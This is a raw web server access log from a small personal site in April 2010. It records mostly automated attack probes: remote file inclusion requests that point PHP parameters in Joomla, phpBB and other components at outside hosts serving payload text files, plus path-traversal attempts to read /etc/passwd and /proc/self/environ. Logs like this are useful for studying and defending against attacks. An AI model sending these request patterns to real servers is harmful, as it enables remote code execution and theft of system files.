222.236.47.182 - - [27/Apr/2010:02:09:21 -0500] "GET /playing.php/common/db.php?commonpath=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
222.236.47.182 - - [27/Apr/2010:02:09:21 -0500] "GET /logs/access_log.1270684800/playing.php/common/db.php?commonpath=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
222.236.47.182 - - [27/Apr/2010:02:09:22 -0500] "GET /playing.php/common/db.php?commonpath=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
222.236.47.182 - - [27/Apr/2010:02:09:22 -0500] "GET /logs/playing.php/common/db.php?commonpath=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
222.236.47.182 - - [27/Apr/2010:02:09:22 -0500] "GET /logs/access_log.1270684800/playing.php/common/db.php?commonpath=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
67.205.1.227 - - [27/Apr/2010:02:17:39 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
67.205.1.227 - - [27/Apr/2010:02:17:39 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
67.205.1.227 - - [27/Apr/2010:02:17:39 -0500] "GET /logs/access_log.1219708800//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
207.46.13.40 - - [27/Apr/2010:02:18:25 -0500] "GET /logs/access_log.1256947200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.199.44 - - [27/Apr/2010:02:19:25 -0500] "GET /logs/access_log.1219881600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.199.40 - - [27/Apr/2010:02:19:54 -0500] "GET /logs/access_log.1215388800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
216.129.119.43 - - [27/Apr/2010:02:23:25 -0500] "GET /tattoo/links.htm HTTP/1.1" 200 1325 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
62.44.79.86 - - [27/Apr/2010:02:25:46 -0500] "GET /logs/access_log.1263513600/?sourcedir=http://www.katalog.artykul.iswift.eu/img//fx29id1.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
62.44.79.86 - - [27/Apr/2010:02:25:46 -0500] "GET /logs/access_log.1264550400/?sourcedir=http://www.katalog.artykul.iswift.eu/img//fx29id1.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
62.44.79.86 - - [27/Apr/2010:02:25:46 -0500] "GET /?sourcedir=http://www.katalog.artykul.iswift.eu/img//fx29id1.txt???? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
62.44.79.86 - - [27/Apr/2010:02:25:46 -0500] "GET /logs/?sourcedir=http://www.katalog.artykul.iswift.eu/img//fx29id1.txt???? HTTP/1.1" 200 3345 "-""Mozilla/5.0"
62.44.79.86 - - [27/Apr/2010:02:26:04 -0500] "GET /?sourcedir=http://www.katalog.artykul.iswift.eu/img//fx29id1.txt???? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
62.44.79.86 - - [27/Apr/2010:02:26:04 -0500] "GET /logs/access_log.1263513600/?sourcedir=http://www.katalog.artykul.iswift.eu/img//fx29id1.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
62.44.79.86 - - [27/Apr/2010:02:26:04 -0500] "GET /logs/access_log.1264550400/?sourcedir=http://www.katalog.artykul.iswift.eu/img//fx29id1.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
62.44.79.86 - - [27/Apr/2010:02:26:04 -0500] "GET /logs/?sourcedir=http://www.katalog.artykul.iswift.eu/img//fx29id1.txt???? HTTP/1.1" 200 3345 "-""Mozilla/5.0"
66.244.236.248 - - [27/Apr/2010:02:26:37 -0500] "GET /logs/access_log.1263081600/allinurl:application.php?base_path=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 335 "-""Mozilla/5.0"
66.244.236.248 - - [27/Apr/2010:02:26:37 -0500] "GET /allinurl:application.php?base_path=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 308 "-""Mozilla/5.0"
66.244.236.248 - - [27/Apr/2010:02:26:38 -0500] "GET /logs/allinurl:application.php?base_path=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 313 "-""Mozilla/5.0"
66.244.236.248 - - [27/Apr/2010:02:27:01 -0500] "GET /logs/access_log.1262649600/allinurl:application.php?base_path=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 335 "-""Mozilla/5.0"
66.59.48.68 - - [27/Apr/2010:02:28:50 -0500] "GET /components/com_flyspray/startdown.php?file=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
66.59.48.68 - - [27/Apr/2010:02:28:51 -0500] "GET /logs/access_log.1270598400/components/com_flyspray/startdown.php?file=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
66.59.48.68 - - [27/Apr/2010:02:28:51 -0500] "GET /logs/components/com_flyspray/startdown.php?file=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
66.244.236.248 - - [27/Apr/2010:02:30:17 -0500] "GET /allinurl:application.php?base_path=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 308 "-""Mozilla/5.0"
66.244.236.248 - - [27/Apr/2010:02:30:17 -0500] "GET /logs/allinurl:application.php?base_path=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 313 "-""Mozilla/5.0"
66.244.236.248 - - [27/Apr/2010:02:30:17 -0500] "GET /logs/access_log.1262649600/allinurl:application.php?base_path=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 335 "-""Mozilla/5.0"
66.244.236.248 - - [27/Apr/2010:02:30:17 -0500] "GET /logs/access_log.1263081600/allinurl:application.php?base_path=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 335 "-""Mozilla/5.0"
207.46.204.234 - - [27/Apr/2010:02:31:54 -0500] "GET /logs/access_log.1172707200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
82.204.180.226 - - [27/Apr/2010:02:36:05 -0500] "GET /costume/ HTTP/1.1" 200 640 "http://ru.wikipedia.org/wiki/%D0%9A%D0%BE%D1%81%D1%82%D1%8E%D0%BC""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17"
82.204.180.226 - - [27/Apr/2010:02:36:06 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17"
82.204.180.226 - - [27/Apr/2010:02:36:09 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17"
121.78.118.123 - - [27/Apr/2010:02:38:13 -0500] "GET /logs/access_log.1265673600/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 370 "-""Mozilla/5.0"
121.78.118.123 - - [27/Apr/2010:02:38:13 -0500] "GET /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 343 "-""Mozilla/5.0"
121.78.118.123 - - [27/Apr/2010:02:38:13 -0500] "GET /logs/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 348 "-""Mozilla/5.0"
121.78.118.123 - - [27/Apr/2010:02:40:14 -0500] "GET /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 343 "-""Mozilla/5.0"
121.78.118.123 - - [27/Apr/2010:02:40:14 -0500] "GET /logs/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 348 "-""Mozilla/5.0"
121.78.118.123 - - [27/Apr/2010:02:40:14 -0500] "GET /logs/access_log.1265673600/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 370 "-""Mozilla/5.0"
209.216.43.133 - - [27/Apr/2010:02:40:34 -0500] "GET /logs////bbs//write_update.php?board_skin_path=http://bboards.co.nz////data/file//music_skin/id1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
209.216.43.133 - - [27/Apr/2010:02:40:34 -0500] "GET ////bbs//write_update.php?board_skin_path=http://bboards.co.nz////data/file//music_skin/id1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
209.216.43.133 - - [27/Apr/2010:02:40:34 -0500] "GET /logs/access_log.1270684800%20%20////bbs//write_update.php?board_skin_path=http://bboards.co.nz////data/file//music_skin/id1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
209.216.43.133 - - [27/Apr/2010:02:42:19 -0500] "GET ///bbs.write_update.php?board_skin_path=http://bboards.co.nz////data/file//music_skin/id1.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
209.216.43.133 - - [27/Apr/2010:02:42:19 -0500] "GET /logs/access_log.1268956800%20%20///bbs.write_update.php?board_skin_path=http://bboards.co.nz////data/file//music_skin/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
209.216.43.133 - - [27/Apr/2010:02:42:19 -0500] "GET /logs///bbs.write_update.php?board_skin_path=http://bboards.co.nz////data/file//music_skin/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
207.46.199.44 - - [27/Apr/2010:02:42:24 -0500] "GET /logs/access_log.1244764800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
209.216.43.133 - - [27/Apr/2010:02:42:45 -0500] "GET ///bbs.write_update.php?board_skin_path=http://bboards.co.nz////data/file//music_skin/id1.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
209.216.43.133 - - [27/Apr/2010:02:42:45 -0500] "GET /logs/access_log.1268956800%20%20///bbs.write_update.php?board_skin_path=http://bboards.co.nz////data/file//music_skin/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
209.216.43.133 - - [27/Apr/2010:02:42:45 -0500] "GET /logs///bbs.write_update.php?board_skin_path=http://bboards.co.nz////data/file//music_skin/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
110.15.200.48 - - [27/Apr/2010:02:45:54 -0500] "GET /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.0knomir.ru/images/smiley/emo/id1.txt???? HTTP/1.1" 404 343 "-""Mozilla/5.0"
110.15.200.48 - - [27/Apr/2010:02:45:54 -0500] "GET /logs/access_log.1265673600/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.0knomir.ru/images/smiley/emo/id1.txt???? HTTP/1.1" 404 370 "-""Mozilla/5.0"
110.15.200.48 - - [27/Apr/2010:02:45:56 -0500] "GET /logs/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.0knomir.ru/images/smiley/emo/id1.txt???? HTTP/1.1" 404 348 "-""Mozilla/5.0"
110.15.200.48 - - [27/Apr/2010:02:45:56 -0500] "GET /logs/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.0knomir.ru/images/smiley/emo/id1.txt???? HTTP/1.1" 404 348 "-""Mozilla/5.0"
110.15.200.48 - - [27/Apr/2010:02:45:57 -0500] "GET /logs/access_log.1265673600/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.0knomir.ru/images/smiley/emo/id1.txt???? HTTP/1.1" 404 370 "-""Mozilla/5.0"
110.15.200.48 - - [27/Apr/2010:02:45:57 -0500] "GET /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.0knomir.ru/images/smiley/emo/id1.txt???? HTTP/1.1" 404 343 "-""Mozilla/5.0"
110.15.200.48 - - [27/Apr/2010:02:46:46 -0500] "GET /logs/access_log.1247011200/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.0knomir.ru/images/smiley/emo/id1.txt???? HTTP/1.1" 404 370 "-""Mozilla/5.0"
110.15.200.48 - - [27/Apr/2010:02:47:07 -0500] "GET /logs/access_log.1247011200/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.0knomir.ru/images/smiley/emo/id1.txt???? HTTP/1.1" 404 370 "-""Mozilla/5.0"
62.44.79.86 - - [27/Apr/2010:02:48:20 -0500] "GET //com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.katalog.artykul.iswift.eu/img//fx29id1.txt???? HTTP/1.1" 404 325 "-""Mozilla/5.0"
62.44.79.86 - - [27/Apr/2010:02:48:20 -0500] "GET /logs//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.katalog.artykul.iswift.eu/img//fx29id1.txt???? HTTP/1.1" 404 330 "-""Mozilla/5.0"
62.44.79.86 - - [27/Apr/2010:02:48:20 -0500] "GET /logs/access_log.1264291200//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.katalog.artykul.iswift.eu/img//fx29id1.txt???? HTTP/1.1" 404 352 "-""Mozilla/5.0"
207.46.199.37 - - [27/Apr/2010:02:48:25 -0500] "GET /logs/access_log.1224806400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
62.44.79.86 - - [27/Apr/2010:02:49:33 -0500] "GET //com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.katalog.artykul.iswift.eu/img//fx29id1.txt???? HTTP/1.1" 404 325 "-""Mozilla/5.0"
62.44.79.86 - - [27/Apr/2010:02:50:19 -0500] "GET /logs//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.katalog.artykul.iswift.eu/img//fx29id1.txt???? HTTP/1.1" 404 330 "-""Mozilla/5.0"
62.44.79.86 - - [27/Apr/2010:02:50:19 -0500] "GET /logs/access_log.1264291200//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.katalog.artykul.iswift.eu/img//fx29id1.txt???? HTTP/1.1" 404 352 "-""Mozilla/5.0"
110.15.200.48 - - [27/Apr/2010:02:50:33 -0500] "GET /logs/access_log.1219363200%20%20/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.0knomir.ru/images/smiley/emo/id1.txt???? HTTP/1.1" 404 372 "-""Mozilla/5.0"
110.15.200.48 - - [27/Apr/2010:02:51:09 -0500] "GET /logs/access_log.1219363200%20%20/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.0knomir.ru/images/smiley/emo/id1.txt???? HTTP/1.1" 404 372 "-""Mozilla/5.0"
67.205.1.227 - - [27/Apr/2010:02:52:00 -0500] "GET //forum/language/lang_english/lang_activity.php?phpbb_root_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
67.205.1.227 - - [27/Apr/2010:02:52:00 -0500] "GET /logs/access_log.1265241600//forum/language/lang_english/lang_activity.php?phpbb_root_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
67.205.1.227 - - [27/Apr/2010:02:52:00 -0500] "GET /logs/access_log.1264118400//forum/language/lang_english/lang_activity.php?phpbb_root_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
67.205.1.227 - - [27/Apr/2010:02:52:00 -0500] "GET /logs//forum/language/lang_english/lang_activity.php?phpbb_root_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
209.216.43.133 - - [27/Apr/2010:02:55:05 -0500] "GET /logs/access_log.1270684800%20%20////bbs//write_update.php?board_skin_path=http://bboards.co.nz////data/file//music_skin/id1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
209.216.43.133 - - [27/Apr/2010:02:55:05 -0500] "GET /logs////bbs//write_update.php?board_skin_path=http://bboards.co.nz////data/file//music_skin/id1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
209.216.43.133 - - [27/Apr/2010:02:55:05 -0500] "GET ////bbs//write_update.php?board_skin_path=http://bboards.co.nz////data/file//music_skin/id1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
209.216.43.133 - - [27/Apr/2010:02:56:26 -0500] "GET /logs////bbs//write_update.php?board_skin_path=http://bboards.co.nz////data/file//music_skin/id1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
209.216.43.133 - - [27/Apr/2010:02:56:26 -0500] "GET /logs/access_log.1270684800%20%20////bbs//write_update.php?board_skin_path=http://bboards.co.nz////data/file//music_skin/id1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
209.216.43.133 - - [27/Apr/2010:02:56:26 -0500] "GET ////bbs//write_update.php?board_skin_path=http://bboards.co.nz////data/file//music_skin/id1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
209.216.43.133 - - [27/Apr/2010:02:56:44 -0500] "GET /logs/access_log.1268956800%20%20////bbs//write_update.php?board_skin_path=http://bboards.co.nz////data/file//music_skin/id1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
209.216.43.133 - - [27/Apr/2010:02:56:53 -0500] "GET ////bbs//write_update.php?board_skin_path=http://bboards.co.nz////data/file//music_skin/id1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
209.216.43.133 - - [27/Apr/2010:02:56:53 -0500] "GET /logs////bbs//write_update.php?board_skin_path=http://bboards.co.nz////data/file//music_skin/id1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
209.216.43.133 - - [27/Apr/2010:02:56:53 -0500] "GET /logs/access_log.1270684800%20%20////bbs//write_update.php?board_skin_path=http://bboards.co.nz////data/file//music_skin/id1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
209.216.43.133 - - [27/Apr/2010:02:57:05 -0500] "GET /logs/access_log.1268956800%20%20////bbs//write_update.php?board_skin_path=http://bboards.co.nz////data/file//music_skin/id1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
114.108.151.149 - - [27/Apr/2010:03:07:05 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 347 "-""Mozilla/5.0"
114.108.151.149 - - [27/Apr/2010:03:07:05 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 352 "-""Mozilla/5.0"
114.108.151.149 - - [27/Apr/2010:03:07:05 -0500] "GET /logs/access_log.1220054400%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 376 "-""Mozilla/5.0"
222.236.47.182 - - [27/Apr/2010:03:07:23 -0500] "GET /logs/access_log.1219363200%20%20//main.php?sayfa=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
222.236.47.182 - - [27/Apr/2010:03:07:23 -0500] "GET //main.php?sayfa=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
222.236.47.182 - - [27/Apr/2010:03:07:23 -0500] "GET /logs//main.php?sayfa=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
222.236.47.182 - - [27/Apr/2010:03:07:38 -0500] "GET //main.php?sayfa=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
222.236.47.182 - - [27/Apr/2010:03:07:38 -0500] "GET /logs//main.php?sayfa=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
222.236.47.182 - - [27/Apr/2010:03:07:38 -0500] "GET /logs/access_log.1219363200%20%20//main.php?sayfa=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
114.108.151.149 - - [27/Apr/2010:03:08:02 -0500] "GET /logs/access_log.1220054400%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 376 "-""Mozilla/5.0"
114.108.151.149 - - [27/Apr/2010:03:08:02 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 347 "-""Mozilla/5.0"
114.108.151.149 - - [27/Apr/2010:03:08:02 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 352 "-""Mozilla/5.0"
207.46.13.47 - - [27/Apr/2010:03:15:25 -0500] "GET /logs/access_log.1238803200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
118.129.170.49 - - [27/Apr/2010:03:18:47 -0500] "GET /logs//public_html/add-ons/modules/sysmanager/plugins/install.plugin.php?AURORA_MODULES_FOLDER=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt???? HTTP/1.1" 404 355 "-""Mozilla/5.0"
118.129.170.49 - - [27/Apr/2010:03:18:47 -0500] "GET //public_html/add-ons/modules/sysmanager/plugins/install.plugin.php?AURORA_MODULES_FOLDER=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt???? HTTP/1.1" 404 350 "-""Mozilla/5.0"
118.129.170.49 - - [27/Apr/2010:03:18:47 -0500] "GET /logs/access_log.1265673600//public_html/add-ons/modules/sysmanager/plugins/install.plugin.php?AURORA_MODULES_FOLDER=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt???? HTTP/1.1" 404 377 "-""Mozilla/5.0"
118.129.170.49 - - [27/Apr/2010:03:18:48 -0500] "GET //public_html/add-ons/modules/sysmanager/plugins/install.plugin.php?AURORA_MODULES_FOLDER=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt???? HTTP/1.1" 404 350 "-""Mozilla/5.0"
118.129.170.49 - - [27/Apr/2010:03:18:48 -0500] "GET /logs//public_html/add-ons/modules/sysmanager/plugins/install.plugin.php?AURORA_MODULES_FOLDER=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt???? HTTP/1.1" 404 355 "-""Mozilla/5.0"
118.129.170.49 - - [27/Apr/2010:03:18:48 -0500] "GET /logs/access_log.1265673600//public_html/add-ons/modules/sysmanager/plugins/install.plugin.php?AURORA_MODULES_FOLDER=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt???? HTTP/1.1" 404 377 "-""Mozilla/5.0"
218.208.228.5 - - [27/Apr/2010:03:21:13 -0500] "GET /logs/access_log.1266710400//?path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
218.208.228.5 - - [27/Apr/2010:03:21:13 -0500] "GET /logs//?path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 3350 "-""Mozilla/5.0"
218.208.228.5 - - [27/Apr/2010:03:21:16 -0500] "GET //?path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
207.46.204.229 - - [27/Apr/2010:03:21:25 -0500] "GET /logs/access_log.1255305600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
194.165.0.6 - - [27/Apr/2010:03:21:38 -0500] "GET /users.php?m=register HTTP/1.1" 404 293 "-""-"
218.208.228.5 - - [27/Apr/2010:03:21:42 -0500] "GET //?path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
218.208.228.5 - - [27/Apr/2010:03:21:42 -0500] "GET /logs//?path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 3350 "-""Mozilla/5.0"
218.208.228.5 - - [27/Apr/2010:03:21:47 -0500] "GET /logs/access_log.1266710400//?path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
218.208.228.5 - - [27/Apr/2010:03:22:01 -0500] "GET /logs//?path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 3350 "-""Mozilla/5.0"
218.208.228.5 - - [27/Apr/2010:03:22:01 -0500] "GET //?path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
218.208.228.5 - - [27/Apr/2010:03:22:01 -0500] "GET /logs/access_log.1262390400//?path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
62.44.79.86 - - [27/Apr/2010:03:29:51 -0500] "GET //init_basic.php?GALLERY_BASEDIR=http://www.katalog.artykul.iswift.eu/img//fx29id1.txt???? HTTP/1.1" 404 299 "-""Mozilla/5.0"
62.44.79.86 - - [27/Apr/2010:03:29:51 -0500] "GET /logs/access_log.1212969600%20%20//init_basic.php?GALLERY_BASEDIR=http://www.katalog.artykul.iswift.eu/img//fx29id1.txt???? HTTP/1.1" 404 328 "-""Mozilla/5.0"
62.44.79.86 - - [27/Apr/2010:03:29:51 -0500] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://www.katalog.artykul.iswift.eu/img//fx29id1.txt???? HTTP/1.1" 404 304 "-""Mozilla/5.0"
119.63.198.28 - - [27/Apr/2010:03:32:42 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
67.195.112.180 - - [27/Apr/2010:03:39:03 -0500] "GET /costume/thmb9.htm HTTP/1.0" 200 2227 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
62.44.79.86 - - [27/Apr/2010:03:39:57 -0500] "GET //init_basic.php?GALLERY_BASEDIR=http://www.katalog.artykul.iswift.eu/img//fx29id1.txt???? HTTP/1.1" 404 299 "-""Mozilla/5.0"
62.44.79.86 - - [27/Apr/2010:03:39:57 -0500] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://www.katalog.artykul.iswift.eu/img//fx29id1.txt???? HTTP/1.1" 404 304 "-""Mozilla/5.0"
62.44.79.86 - - [27/Apr/2010:03:39:57 -0500] "GET /logs/access_log.1212969600%20%20//init_basic.php?GALLERY_BASEDIR=http://www.katalog.artykul.iswift.eu/img//fx29id1.txt???? HTTP/1.1" 404 328 "-""Mozilla/5.0"
207.46.204.227 - - [27/Apr/2010:03:41:54 -0500] "GET /logs/access_log.1195516800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
66.249.71.36 - - [27/Apr/2010:03:43:04 -0500] "GET /costume/thmb8.htm HTTP/1.1" 200 3054 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
207.46.199.198 - - [27/Apr/2010:03:45:18 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.132 - - [27/Apr/2010:03:46:25 -0500] "GET /logs/access_log.1222646400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
216.129.119.43 - - [27/Apr/2010:03:49:35 -0500] "GET /costume/ HTTP/1.1" 200 640 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
113.52.152.6 - - [27/Apr/2010:03:57:04 -0500] "GET /template.php?content=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-""libwww-perl/5.805"
113.52.152.6 - - [27/Apr/2010:03:57:04 -0500] "GET /template.php?content=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-""libwww-perl/5.805"
